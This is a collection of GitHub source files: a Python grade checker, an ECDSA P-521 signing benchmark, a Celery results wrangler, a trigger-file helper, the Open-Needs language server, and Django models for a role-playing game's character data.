+{"seq_id":"42379587409","text":"#Verifica Aprovação\n\ndef verifica(valor):\n if valor == 10.0:\n return (\"Aprovado com Distinção\")\n elif valor >= 7.0:\n return (\"Aprovado\")\n else:\n return (\"Reprovado\")\n\n\ndef main ():\n\n nota1 = float (input(\"Digite a nota 1: \"))\n nota2 = float (input(\"Digite a nota 2: \"))\n\n media = (nota1 + nota2)/2\n \n print (f\"Com a média {media} o aluno está {verifica(media)}\")\n\n\nmain()","repo_name":"joaohfgarcia/python","sub_path":"uniesp_p2/exercicio_k.py","file_name":"exercicio_k.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40563355761","text":"# -------------------------------------------------\r\n# ECDSA Prime Field\r\n# 512 bits - SHA 512 \r\n# q = 512 bits\r\n# -------------------------------------------------\r\n\r\n# --- BIBLIOTECAS NECESARIAS --\r\n\r\n# -- ECDSA Prime Field 512 bits - SHA 512 \r\nfrom cryptography.hazmat.primitives import hashes\r\nfrom cryptography.hazmat.primitives.asymmetric import ec\r\nfrom cryptography.hazmat.primitives.asymmetric import utils\r\nfrom cryptography import exceptions\r\n\r\n# -- Medir tiempo\r\nimport time \r\n\r\n# ---- ALGORITMO -----\r\n\r\ndef ecdsa521(msg):\r\n\t# --- PARAMETROS --\r\n\r\n\t# -- Curva\r\n\r\n\tE = ec.SECP521R1() # Se crea una instancia de la curva eliptica sobre un campo primo \r\n\r\n\t# -- Par de llaves\r\n\r\n\t# Llave privada\r\n\tx = \"0FAD06DAA62BA3B25D2FB40133DA757205DE67F5BB0018FEE8C86E1B68C7E75CAA896EB32F1F47C70855836A6D16FCC1466F6D8FBEC67DB89EC0C08B0E996B83538\"\r\n\t# Se obtiene el numero entero correspondiente a la representacion en hexadecimal\r\n\tx = int(x,16)\r\n\r\n\t# Llave publica U = xG\r\n\r\n\t# Coordenada x\r\n\tUx = \"1894550D0785932E00EAA23B694F213F8C3121F86DC97A04E5A7167DB4E5BCD371123D46E45DB6B5D5370A7F20FB633155D38FFA16D2BD761DCAC474B9A2F5023A4\"\r\n\t# Se obtiene el numero entero correspondiente a la representacion en hexadecimal\r\n\tUx = int(Ux,16)\r\n\t# Coordenada y\r\n\tUy = \"0493101C962CD4D2FDDF782285E64584139C2F91B47F87FF82354D6630F746A28A0DB25741B5B34A828008B22ACC23F924FAAFBD4D33F81EA66956DFEAA2BFDFCF5\"\r\n\t# Se obtiene el numero entero correspondiente a la representacion en hexadecimal\r\n\tUy = int(Uy,16)\r\n\r\n\t# --- GENERACION DE LLAVES --\r\n\r\n\t# Llave publica\r\n\tpubECC = ec.EllipticCurvePublicNumbers(x=Ux, y=Uy, curve=E)\r\n\tpubKECC = pubECC.public_key()\r\n\r\n\t# Llave privada\r\n\tprivECC = ec.EllipticCurvePrivateNumbers(private_value=x, public_numbers=pubECC)\r\n\tprivKECC = privECC.private_key()\r\n\r\n\t# -- FIRMA --\r\n\tinicio = 
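# Note on the sign/verify flow used just below: sign() returns a
# DER-encoded ECDSA signature that utils.decode_dss_signature unpacks into
# the integer pair (r, s), and verify() raises InvalidSignature on a bad
# signature rather than returning False, hence the try/except around it.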
time.time()\r\n\tECC_sign = privKECC.sign(data=msg, signature_algorithm=ec.ECDSA(hashes.SHA512()))\r\n\tfin = time.time()\r\n\tr,s = utils.decode_dss_signature(ECC_sign)\r\n\tt_firma = fin - inicio\r\n\t#print(\"tiempo = %f\" % (t_firma))\r\n\t#print(\"r = {}\".format(hex(s)))\r\n\t#print(\"s = {}\".format(hex(r)))\r\n\r\n\t# -- VERIFICACION --\r\n\ttry:\r\n\t\tinicio = time.time()\r\n\t\tpubKECC.verify(signature=ECC_sign, data=msg, signature_algorithm=ec.ECDSA(hashes.SHA512()))\r\n\t\tfin = time.time()\r\n\t\tt_verificacion = fin - inicio\r\n\t\t#print(\"tiempo = %f\" % (t_verificacion))\r\n\t\treturn t_firma,t_verificacion \r\n\texcept(exceptions.InvalidSignature):\r\n\t\t#print(\"tiempo =-1\")\r\n\t\treturn t_firma,-1\r\n","repo_name":"antoniotorres0605/proyectoCriptografia","sub_path":"ECDSA_prime.py","file_name":"ECDSA_prime.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15204295503","text":"\"\"\"Wrangler for Microbe Directory results.\"\"\"\n\nfrom celery import chain\n\nfrom app.display_modules.display_wrangler import DisplayModuleWrangler\n\nfrom .constants import MODULE_NAME\nfrom .tasks import (\n microbe_directory_reducer,\n persist_result,\n collate_microbe_directory\n)\n\n\nclass MicrobeDirectoryWrangler(DisplayModuleWrangler):\n \"\"\"Tasks for generating virulence results.\"\"\"\n\n @classmethod\n def run_sample(cls, sample_id, sample):\n \"\"\"Gather single sample and process.\"\"\"\n samples = [sample]\n collate_task = collate_microbe_directory.s(samples)\n reducer_task = microbe_directory_reducer.s()\n analysis_result_uuid = sample['analysis_result']\n persist_task = persist_result.s(analysis_result_uuid, MODULE_NAME)\n\n task_chain = chain(collate_task, reducer_task, persist_task)\n result = task_chain.delay()\n\n return result\n\n @classmethod\n def run_sample_group(cls, sample_group, samples):\n \"\"\"Gather and process samples.\"\"\"\n collate_task = collate_microbe_directory.s(samples)\n reducer_task = microbe_directory_reducer.s()\n persist_task = persist_result.s(sample_group.analysis_result_uuid, MODULE_NAME)\n\n task_chain = chain(collate_task, reducer_task, persist_task)\n result = task_chain.delay()\n\n return result\n","repo_name":"MetaGenScope/metagenscope-server","sub_path":"app/display_modules/microbe_directory/wrangler.py","file_name":"wrangler.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5181239830","text":"from datetime import datetime, timedelta\nimport random, os, logging\n\nlogger = logging.getLogger(__name__)\n\ndef make_trigger_datetime(max_min=10, max_sec=59, max_id=3):\n \"\"\" Make datetime for trigger\n\n Arguments :\n max_min: random maximum number of minutes\n max_sec: random maximum number of seconds\n max_id: random maximum number of modules\n Returns :\n trigger_filename: trigger filename\n False: exception\n\n \"\"\"\n try:\n # formatter datetime\n fmt = '%Y%m%d%H%M%S'\n # offset\n min_delta = random.randint(0,max_min)\n sec_delta = random.randint(0,max_sec)\n mod_id = random.randint(0,max_id)\n\n #make datetime\n end_dt = datetime.now()\n stt_dt = end_dt - timedelta(minutes=min_delta) - timedelta(seconds=sec_delta)\n\n #combined string\n trigger_filename = str(mod_id).zfill(3) + '-' + stt_dt.strftime(fmt) + '-' + end_dt.strftime(fmt) + '.tgr'\n logger.info('Make trigger filename: ' + trigger_filename)\n \n return 
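# Shape of the filename returned here, given fmt = '%Y%m%d%H%M%S' and the
# zero-padded module id: '<mod>-<start>-<end>.tgr'. For example, module id 2
# with a 3m20s window ending 2024-01-01 12:00:00 would yield
# '002-20240101115640-20240101120000.tgr'.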
trigger_filename\n\n except:\n logger.error('Something error to making trigger filename')\n return False\n\n \ndef replicate_trigger(dir_path, tgr_filename):\n \"\"\" Replicate triggr file\n\n Arguments :\n dir_path: Path to directory for replication\n tgr_filename: trigger filename\n Returns :\n True or False\n \"\"\"\n try:\n # Make directory when nothing\n os.makedirs(dir_path, exist_ok=True)\n with open(os.path.join(dir_path, tgr_filename), 'w'):\n pass\n logger.info('Write trigger file: ' + os.path.join(dir_path, tgr_filename))\n return True\n\n except FileNotFoundError as err:\n logger.error('Write error: ' + err)\n return False\n\n except FileExistsError as err:\n logger.error('Write error: ' + err)\n return False","repo_name":"masa-ce/trigger_client","sub_path":"libs/mtime.py","file_name":"mtime.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23961294602","text":"# --------------------------------------------------------------------------\n# Licensed under the MIT license.\n# See License.txt in the project root for further license information.\n# --------------------------------------------------------------------------\n\n############################################################################\n# Based on pygls #\n# See ThirdPartyNotices.txt in the project root for additional notices. #\n############################################################################\n\nimport getpass\nimport os\nimport pathlib\nimport re\nfrom hashlib import blake2b\nfrom typing import List, Tuple\n\nfrom pygls.lsp.methods import (\n COMPLETION,\n COMPLETION_ITEM_RESOLVE,\n DEFINITION,\n HOVER,\n INITIALIZED,\n TEXT_DOCUMENT_DID_CHANGE,\n TEXT_DOCUMENT_DID_CLOSE,\n TEXT_DOCUMENT_DID_OPEN,\n WORKSPACE_DID_CHANGE_CONFIGURATION,\n)\nfrom pygls.server import LanguageServer\nfrom pygls.lsp.types import (\n CompletionItem,\n CompletionItemKind,\n CompletionList,\n CompletionOptions,\n CompletionParams,\n ConfigurationItem,\n ConfigurationParams,\n DidChangeTextDocumentParams,\n DidCloseTextDocumentParams,\n DidOpenTextDocumentParams,\n Hover,\n InitializeParams,\n InsertTextFormat,\n Location,\n MarkupContent,\n MarkupKind,\n MessageType,\n Position,\n Range,\n TextEdit,\n)\n\nfrom needls.needs_store import NeedsStore\n\n\nclass NeedsLanguageServer(LanguageServer):\n CMD_UPDATE_SETTINGS = \"needls.update_settings\"\n\n CONFIGURATION_SECTION = \"needls\"\n\n def __init__(self):\n super().__init__()\n\n self.needs_store = NeedsStore()\n\n\nneeds_server = NeedsLanguageServer()\n\n\ndef _validate(ls, params):\n text_doc = ls.workspace.get_document(params.text_document.uri)\n\n source = text_doc.source\n diagnostics = _validate_sphinx(source) if source else []\n\n ls.publish_diagnostics(text_doc.uri, diagnostics)\n\n\ndef _validate_sphinx(source):\n \"\"\"TODO: Validates sphinx reST file.\"\"\"\n diagnostics = []\n return diagnostics\n\n\ndef col_to_word_index(col: int, words: List[str]) -> int:\n \"\"\"Return the index of a word in a list of words for a given line character column.\"\"\"\n length = 0\n index = 0\n for word in words:\n length = length + len(word)\n if col <= length + index:\n return index\n index = index + 1\n return index - 1\n\n\ndef get_lines(ls, params) -> List[str]:\n \"\"\"Get all text lines in the current document.\"\"\"\n text_doc = ls.workspace.get_document(params.text_document.uri)\n source = text_doc.source\n return source.splitlines()\n\n\ndef get_word(ls, params) -> 
str:\n \"\"\"Return the word in a line of text at a character position.\"\"\"\n line_no, col = params.position\n lines = get_lines(ls, params)\n if line_no >= len(lines):\n return \"\"\n line = lines[line_no]\n words = line.split()\n index = col_to_word_index(col, words)\n return words[index]\n\n\ndef get_lines_and_word(ls, params) -> Tuple[List[str], str]:\n return (get_lines(ls, params), get_word(ls, params))\n\n\ndef get_need_type_and_id(ls, params) -> Tuple[str, str]:\n \"\"\"Return tupel (need_type, need_id) for a given document position.\"\"\"\n word = get_word(ls, params)\n for need in ls.needs_store.needs.values():\n if need[\"id\"] in word:\n return (need[\"type\"], need[\"id\"])\n return (None, None)\n\n\ndef doc_completion_items(ls, docs: List[str], doc_pattern: str) -> List[CompletionItem]:\n \"\"\"Return completion items for a given doc pattern.\"\"\"\n\n # calc all doc paths that start with the given pattern\n all_paths = [doc for doc in docs if doc.startswith(doc_pattern)]\n\n if len(all_paths) == 0:\n return\n\n # leave if there is just one path\n if len(all_paths) == 1:\n insert_text = all_paths[0][len(doc_pattern) :]\n return [\n CompletionItem(\n label=insert_text,\n insert_text=insert_text,\n kind=CompletionItemKind.File,\n detail=\"needs doc\",\n )\n ]\n\n # look at increasingly longer paths\n # stop if there are at least two options\n max_path_length = max(path.count(\"/\") for path in all_paths)\n current_path_length = doc_pattern.count(\"/\")\n\n if max_path_length == current_path_length == 0:\n sub_paths = all_paths\n return [\n CompletionItem(\n label=sub_path, kind=CompletionItemKind.File, detail=\"path to needs doc\"\n )\n for sub_path in sub_paths\n ]\n\n # create list that contains only paths up to current path length\n sub_paths = []\n for path in all_paths:\n if path.count(\"/\") >= current_path_length:\n new_path = \"/\".join(\n path.split(\"/\")[current_path_length : current_path_length + 1]\n )\n if new_path not in sub_paths:\n sub_paths.append(new_path)\n sub_paths.sort()\n\n items = []\n for sub_path in sub_paths:\n if sub_path.find(\".rst\") > -1:\n kind = CompletionItemKind.File\n else:\n kind = 19 # Folder\n items.append(\n CompletionItem(label=sub_path, kind=kind, detail=\"path to needs doc\")\n )\n return items\n\n\ndef complete_need_link(\n ls, params: CompletionParams, lines: List[str], line: str, word: str\n):\n # specify the need type, e.g.,\n # ->req\n if word.count(\">\") == 1:\n return CompletionList(\n is_incomplete=True,\n items=[\n CompletionItem(label=need_type, detail=\"need type\")\n for need_type in ls.needs_store.types\n ],\n )\n\n word_parts = word.split(\">\")\n\n # specify doc in which need is specified, e.g.,\n # ->req>fusion/index.rst\n if word.count(\">\") == 2:\n requested_type = word_parts[1] # e.g., req, test, ...\n if requested_type in ls.needs_store.types:\n return CompletionList(\n is_incomplete=True,\n items=doc_completion_items(\n ls, ls.needs_store.docs_per_type[requested_type], word_parts[2]\n ),\n )\n\n # specify the exact need, e.g.,\n # ->req>fusion/index.rst>REQ_001\n if word.count(\">\") == 3:\n requested_type = word_parts[1] # e.g., req, test, ...\n requested_doc = word_parts[2] # [0:-4] # without `.rst` file extension\n if requested_doc in ls.needs_store.needs_per_doc:\n substitution = word[word.find(\"->\") :]\n start_char = line.find(substitution)\n line_number = params.position.line\n return CompletionList(\n is_incomplete=False,\n items=[\n CompletionItem(\n label=need[\"id\"],\n insert_text=need[\"id\"],\n 
documentation=need[\"description\"],\n detail=need[\"title\"],\n additional_text_edits=[\n TextEdit(\n range=Range(\n start=Position(\n line=line_number, character=start_char\n ),\n end=Position(\n line=line_number,\n character=start_char + len(substitution),\n ),\n ),\n new_text=\"\",\n )\n ],\n )\n for need in ls.needs_store.needs_per_doc[requested_doc]\n if need[\"type\"] == requested_type\n ],\n )\n\n\ndef generate_hash(user_name, doc_uri, need_prefix, line_number):\n salt = os.urandom(blake2b.SALT_SIZE) # pylint: disable=no-member\n return blake2b(\n f\"{user_name}{doc_uri}{need_prefix}{line_number}\".encode(),\n digest_size=4,\n salt=salt,\n ).hexdigest()\n\n\ndef generate_need_id(\n ls, params, lines: List[str], word: str, need_type: str = None\n) -> str:\n \"\"\"Generate a need ID including hash suffix.\"\"\"\n\n user_name = getpass.getuser()\n doc_uri = params.text_document.uri\n line_number = params.position.line\n\n if not need_type:\n try:\n match = re.search(\".. ([a-z]+)::\", lines[line_number - 1])\n need_type = match.group(1)\n except AttributeError:\n return \"ID\"\n\n need_prefix = need_type.upper()\n hash_part = generate_hash(user_name, doc_uri, need_prefix, line_number)\n need_id = need_prefix + \"_\" + hash_part\n # re-generate hash if ID is already in use\n while need_id in ls.needs_store.needs:\n hash_part = generate_hash(user_name, doc_uri, need_prefix, line_number)\n need_id = need_prefix + \"_\" + hash_part\n return need_id\n\n\ndef complete_directive(ls, params, lines: List[str], word: str):\n # need_type ~ req, work, act, ...\n items = []\n for need_type, title in ls.needs_store.declared_types.items():\n text = (\n \" \" + need_type + \":: ${1:title}\\n\"\n \"\\t:id: ${2:\"\n + generate_need_id(ls, params, lines, word, need_type=need_type)\n + \"}\\n\"\n \"\\t:status: open\\n\\n\"\n \"\\t${3:content}.\\n$0\"\n )\n label = f\".. 
{need_type}::\"\n items.append(\n CompletionItem(\n label=label,\n detail=title,\n insert_text=text,\n insert_text_format=InsertTextFormat.Snippet,\n kind=CompletionItemKind.Snippet,\n )\n )\n return CompletionList(is_incomplete=False, items=items)\n\n\ndef complete_role_or_option(ls, params, lines: List[str], word: str):\n return CompletionList(\n is_incomplete=False,\n items=[\n CompletionItem(\n label=\":id:\",\n detail=\"needs option\",\n insert_text=\"id: ${1:\"\n + generate_need_id(ls, params, lines, word)\n + \"}\\n$0\",\n insert_text_format=InsertTextFormat.Snippet,\n kind=CompletionItemKind.Snippet,\n ),\n CompletionItem(\n label=\":need:\",\n detail=\"need role\",\n insert_text=\"need:`${1:ID}` $0\",\n insert_text_format=InsertTextFormat.Snippet,\n kind=CompletionItemKind.Snippet,\n ),\n ],\n )\n\n\n@needs_server.feature(\n COMPLETION, CompletionOptions(trigger_characters=[\">\", \"/\", \":\", \".\"])\n)\ndef completions(ls, params: CompletionParams = None):\n \"\"\"Returns completion items.\"\"\"\n\n if not ls.needs_store.needs_initialized:\n return []\n\n lines, word = get_lines_and_word(ls, params)\n line_number = params.position.line\n if line_number >= len(lines):\n ls.show_message_log(\n f\"line {line_number} is empty, no completion trigger characters detected\"\n )\n return []\n line = lines[line_number]\n\n if word.startswith(\"->\") or word.startswith(\":need:`->\"):\n new_word = word.replace(\":need:`->\", \"->\")\n new_word = new_word.replace(\"`\", \"\") # in case need:`->...>...`\n return complete_need_link(ls, params, lines, line, new_word)\n\n if word.startswith(\":\"):\n return complete_role_or_option(ls, params, lines, word)\n\n if word.startswith(\"..\"):\n return complete_directive(ls, params, lines, word)\n\n return []\n\n\n@needs_server.feature(COMPLETION_ITEM_RESOLVE)\ndef completions_resolve(ls, item: CompletionItem):\n pass\n\n\n@needs_server.feature(TEXT_DOCUMENT_DID_CHANGE)\ndef did_change(ls, params: DidChangeTextDocumentParams):\n \"\"\"Text document did change notification.\"\"\"\n _validate(ls, params)\n\n\n@needs_server.feature(TEXT_DOCUMENT_DID_CLOSE)\ndef did_close(server: NeedsLanguageServer, params: DidCloseTextDocumentParams):\n \"\"\"Text document did close notification.\"\"\"\n return\n\n\n@needs_server.feature(TEXT_DOCUMENT_DID_OPEN)\nasync def did_open(ls, params: DidOpenTextDocumentParams):\n \"\"\"Text document did open notification.\"\"\"\n _validate(ls, params)\n\n\n@needs_server.feature(INITIALIZED)\ndef did_initialize(ls, params: InitializeParams):\n \"\"\"Server was initialized.\"\"\"\n ls.show_message(\"Initialized Open-Needs IDE Language Server\")\n return True\n\n\n@needs_server.feature(WORKSPACE_DID_CHANGE_CONFIGURATION)\nasync def did_change_workspace_config(ls, params):\n \"\"\"Workspace was initialized.\"\"\"\n ls.show_message(\"Workspace config changed\")\n\n try:\n config = await ls.get_configuration_async(\n ConfigurationParams(\n [ConfigurationItem(\"\", NeedsLanguageServer.CONFIGURATION_SECTION)]\n )\n )\n ls.needs_store.load_needs(os.path.abspath(config[0].needs_file))\n ls.needs_store.set_docs_root(os.path.abspath(config[0].docs_root))\n\n ls.show_message(\n \"using needs in (from ws change): \" + os.path.abspath(config[0].needs_file)\n )\n\n except Exception as e:\n ls.show_message_log(f\"Error ocurred: {e}\")\n\n\n@needs_server.feature(DEFINITION)\nasync def did_definition(ls, params):\n \"\"\"Return location of definition of a need.\"\"\"\n\n if not ls.needs_store.is_setup():\n return\n\n need_type, need_id = 
get_need_type_and_id(ls, params)\n\n # get need defining doc\n try:\n need = ls.needs_store.needs[need_id]\n except KeyError:\n return None\n\n doc_path = os.path.join(ls.needs_store.docs_root, need[\"docname\"])\n if os.path.exists(doc_path + \".rst\"):\n doc_path = doc_path + \".rst\"\n elif os.path.exists(doc_path + \".rest\"):\n doc_path = doc_path + \".rest\"\n else:\n return None\n doc_uri = pathlib.Path(doc_path).as_uri()\n\n # get the need definition position (line, col) from file\n with open(doc_path) as file:\n source_lines = file.readlines()\n # get the line number\n line_count = 0\n line_no = None\n pattern = f\":id: {need_id}\"\n for line in source_lines:\n if pattern in line:\n line_no = line_count\n break\n line_count = line_count + 1\n if not line_no:\n return None\n\n # get line of directive (e.g., .. req::)\n line_directive = None\n pattern = f\".. {need_type}::\"\n for line_count in range(line_no - 1, -1, -1):\n if pattern in source_lines[line_count]:\n line_directive = line_count\n break\n if not line_directive:\n return None\n\n pos = Position(line=line_directive, character=0)\n return Location(uri=doc_uri, range=Range(start=pos, end=pos))\n\n\n@needs_server.feature(HOVER)\nasync def did_hover(ls, params):\n\n if not ls.needs_store.is_setup():\n return\n\n try:\n need_id = get_need_type_and_id(ls, params)[1]\n except IndexError:\n return None\n if not need_id:\n return None\n\n try:\n title = ls.needs_store.needs[need_id][\"title\"]\n description = ls.needs_store.needs[need_id][\"description\"]\n return Hover(\n contents=MarkupContent(\n kind=MarkupKind.Markdown,\n value=f\"**{title}**\\n\\n```\\n{description}\\n```\",\n )\n )\n except KeyError:\n # need is not in the database\n return None\n\n\n@needs_server.command(NeedsLanguageServer.CMD_UPDATE_SETTINGS)\ndef update_settings(ls, *args):\n \"\"\" \"\"\"\n docs_root = args[0][0]\n needs_file = os.path.join(args[0][1], \"needs\", \"needs.json\")\n\n ls.show_message_log(\"Update settings...\")\n ls.show_message_log(f\"Docs root: {docs_root}\")\n ls.show_message_log(f\"Needs file: {needs_file}\")\n\n try:\n ls.needs_store.set_docs_root(docs_root)\n except Exception as e:\n ls.show_message_log(f\"Something is wrong with Docs root: {docs_root} -> {e}\")\n ls.show_message(\n \"Error setting document root! Are your settings correct?\",\n msg_type=MessageType.Error,\n )\n return\n\n # check if confPath configured\n if len(args[0]) >= 4:\n if args[0][3]:\n # check if path is relative path\n if not os.path.isabs(args[0][3]):\n conf_py_path = os.path.join(os.getcwd(), args[0][3])\n ls.show_message_log(\n f\"Relative confPath is given -> {args[0][3]}, need to caluculate to absolute path -> {conf_py_path}\"\n )\n else:\n conf_py_path = args[0][3]\n ls.show_message_log(f\"Absolute confPath is given -> {conf_py_path}\")\n else:\n ls.show_message_log(\n \"confPath not configured. 
Using default conf.py under docs root.\"\n )\n conf_py_path = os.path.join(docs_root, \"conf.py\")\n else:\n conf_py_path = os.path.join(docs_root, \"conf.py\")\n\n try:\n ls.needs_store.set_conf_py(conf_py_path)\n except Exception as e:\n ls.show_message_log(\n f\"Something is wrong with configuration file: {conf_py_path} -> {e}\"\n )\n ls.show_message(\n \"Error setting configuration file conf.py\",\n msg_type=MessageType.Error,\n )\n return\n\n try:\n ls.needs_store.set_declared_types()\n ls.show_message_log(f\"Declared need types: {ls.needs_store.declared_types}\")\n except Exception as e:\n ls.show_message_log(\n f\"Something is wrong with declared need types: {ls.needs_store.declared_types} -> {e}\"\n )\n ls.show_message(\n \"Error loading declared needs_types from conf.py\",\n msg_type=MessageType.Error,\n )\n return\n\n try:\n ls.needs_store.load_needs(needs_file)\n # for debugging\n ls.show_message_log(\n f\"Loaded {len(ls.needs_store.needs)} needs from needs.json: {list(ls.needs_store.needs.keys())}\"\n )\n except Exception as e:\n ls.show_message_log(f\"Failed to load needs.json: {needs_file} -> {e}\")\n ls.show_message(\n \"Error loading needs.json! Are your settings correct?\",\n msg_type=MessageType.Error,\n )\n return\n ls.show_message_log(\"Using needs in: \" + os.path.abspath(needs_file))\n","repo_name":"open-needs/open-needs-ide","sub_path":"needls/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":18259,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"25976408432","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import m2m_changed\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.core.exceptions import ValidationError\nfrom profile.models import Profile\n\nWAYS_CHOICES = (\n ('Co', 'Combativité'),\n ('Cr', 'Créativité'),\n ('Em', 'Empathie'),\n ('Ra', 'Raison'),\n ('Id', 'Idéal')\n)\n\n\nclass Nation(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='peuple',\n unique=True)\n description = models.TextField(verbose_name='description', blank=True)\n noun = models.CharField(max_length=100,\n verbose_name='nom')\n plural = models.CharField(max_length=100,\n verbose_name='pluriel')\n feminine = models.CharField(max_length=100,\n verbose_name='feminin')\n preposition = models.CharField(max_length=20,\n verbose_name='preposition',\n blank=True)\n\n def __str__(self):\n return self._meta.verbose_name + ' ' + self.preposition + ' ' + self.name\n\n class Meta:\n verbose_name = 'Peuple'\n verbose_name_plural = 'Peuples'\n ordering = (\"name\",)\n\n\nclass Place(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='place',\n unique=True)\n description = models.TextField(verbose_name='description', blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Lieu de résidence'\n verbose_name_plural = 'Lieux de résidences'\n ordering = (\"name\",)\n\n\nclass Discipline(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='nom',\n unique=True)\n description = models.TextField(blank=True,\n verbose_name='description')\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Discipline'\n verbose_name_plural = 'Disciplines'\n ordering = (\"name\",)\n\n\nclass Way(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='Voie',\n unique=True)\n description = 
models.TextField(verbose_name='description',\n blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Voie'\n verbose_name_plural = 'Voies'\n ordering = (\"name\",)\n\n\nclass Domain(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='domaine',\n unique=True)\n description = models.TextField(verbose_name='description',\n blank=True)\n way = models.ForeignKey(Way, on_delete=models.CASCADE, related_name='domain')\n disciplines = models.ManyToManyField(Discipline,\n verbose_name='discipline',\n related_name='domains')\n\n def __str__(self):\n return self.name + ' (' + self.way.name[:2] + ')'\n\n class Meta:\n verbose_name = 'Domaine'\n verbose_name_plural = 'Domaines'\n ordering = (\"name\",)\n\n\nclass Social(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='social',\n unique=True)\n description = models.TextField(verbose_name='description',\n blank=True)\n\n domains = models.ManyToManyField(Domain,\n verbose_name='domaines',\n related_name='domains')\n\n def __str__(self):\n return self.name + ' (' + ','.join([domain.name for domain in self.domains.all()]) + ')'\n\n class Meta:\n verbose_name = 'Classe sociale'\n verbose_name_plural = 'Classes sociales'\n ordering = (\"name\",)\n\n\nclass Profession(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='metier',\n unique=True)\n description = models.TextField(verbose_name='description',\n blank=True)\n primary_domain = models.ForeignKey(Domain,\n verbose_name='domaine primaire',\n on_delete=models.SET_NULL,\n null=True,\n related_name='primary_domain')\n secondary_domain = models.ManyToManyField(Domain,\n verbose_name='domaine secondaire',\n related_name='secondary_domain')\n\n def __str__(self):\n return self.name + ' (' + self.primary_domain.name + '), (' + ','.join([sec.name for sec in self.secondary_domain.all()]) + ')'\n\n class Meta:\n verbose_name = 'Metier'\n verbose_name_plural = 'Metiers'\n ordering = (\"name\",)\n\n\nclass Traits(models.Model):\n TRAIT_CHOICE = (\n ('QMAJ', 'Qualité majeur'),\n ('QMIN', 'Qualité mineur'),\n ('FMAJ', 'Défaut majeur'),\n ('FMIN', 'Défaut mineur'),\n )\n name = models.CharField(max_length=100,\n verbose_name='trait de caractère',\n unique=True)\n way = models.ForeignKey(Way, on_delete=models.CASCADE, related_name='traits')\n type_trait = models.CharField(max_length=10, choices=TRAIT_CHOICE)\n\n def __str__(self):\n return self.name + ' (' + str(self.way) + ', ' + self.get_type_trait_display() + ')'\n\n class Meta:\n verbose_name = 'Trait de caractère'\n verbose_name_plural = 'traits de caractères'\n ordering = (\"name\",)\n\n\n#class DomainLevels(models.Model):\n# skill = models.ForeignKey(Domain, null=True, on_delete=models.SET_NULL)\n# level = models.IntegerField()\n# first_domain = models.BooleanField()\n# secondary_domain = models.BooleanField()\n\n# def __str__(self):\n# return self.skill.name + ' niveau ' + str(self.level)\n\n\nclass Setback(models.Model):\n name = models.CharField(max_length=100, verbose_name='nom',\n unique=True)\n description = models.TextField(verbose_name='description',\n blank=True)\n feminine = models.CharField(max_length=100, verbose_name='feminin')\n # rajouter un malus => suivant ce que c'est, sur le truc\n\n class Meta:\n verbose_name = 'Revers'\n verbose_name_plural = 'Revers'\n ordering = (\"name\",)\n\n\n# Un désavantage, au final, c'est aussi un avantage mais négatif !\nclass Advantage(models.Model):\n name = models.CharField(max_length=100, verbose_name='nom',\n 
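# each advantage name must be unique across the table\n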
unique=True)\n points = models.IntegerField()\n descriptions = models.TextField(verbose_name='description',\n blank=True)\n # bonus : discipline / domaine et nbre de points en plus\n # le bonus peut être aussi textuel : ex : allié il faut le nom de son allié\n # le bonus peut être aussi monetaire : aisance financière...\n # c'est la merde en fait !\n bonus = None\n # on peut faire un avantage++ qui est comme une évolution d'un avantage\n # pour simuler cela, on peut faire un avantage qui requiert d'avoir l'avantage \"niveau n-1\"\n # difficulté de cette méthode : n'afficher que le dernier niveau\n # et savoir s'il faut tenir compte que du bonus du dernier niveau, ou du bonus de tous les autres niveaux\n # donc le bonus serait vu que comme une addition.\n requiert = None\n\n\nclass Personage(models.Model):\n SEXE_CHOICES = (\n ('F', 'Femme'),\n ('H', 'Homme'),\n )\n name = models.CharField(max_length=100, verbose_name='nom')\n genre = models.CharField(max_length=10,\n choices=SEXE_CHOICES)\n birthdate = models.PositiveIntegerField(validators=[MinValueValidator(0), MaxValueValidator(150)],\n default=20)\n nation = models.ForeignKey(Nation, null=True, on_delete=models.SET_NULL,\n verbose_name='peuple')\n profession = models.ManyToManyField(Profession,\n verbose_name='metier',\n related_name='personages')\n description = models.TextField(verbose_name='description',\n blank=True)\n player = models.ForeignKey(Profile, on_delete=models.CASCADE,\n verbose_name='joueur',\n related_name='personages')\n\n advantages = models.ForeignKey(Advantage,\n verbose_name='avantage',\n blank=True,\n null=True,\n on_delete=models.SET_NULL)\n disadvantages = None\n sanity = models.PositiveIntegerField(validators=[MinValueValidator(0), MaxValueValidator(19)],\n default=19)\n\n #survie, vigueur : calculé automatiquement à la création du perso => fonction pour la valeur de base\n # Valeurs stockées = valeurs qui peut être modifié au cours de la partie. A la création c'est utilisé par celle de base\n # ne peut pas dépasser celle de base.\n stamina = None\n survival = None\n\n\n weapons = None\n armor = None\n # potentiel de combat, defense, rapidité : calculé automatiquement\n # score d'attaque calculé automatiquement\n # attitude : automatique, mouvement aussi, protection aussi\n\n # ajouter automatiquement weapon et armor à la liste des équipements quand elle est demandée\n # text ou database equipment qui permet de pouvoir ajouter des élements ? 
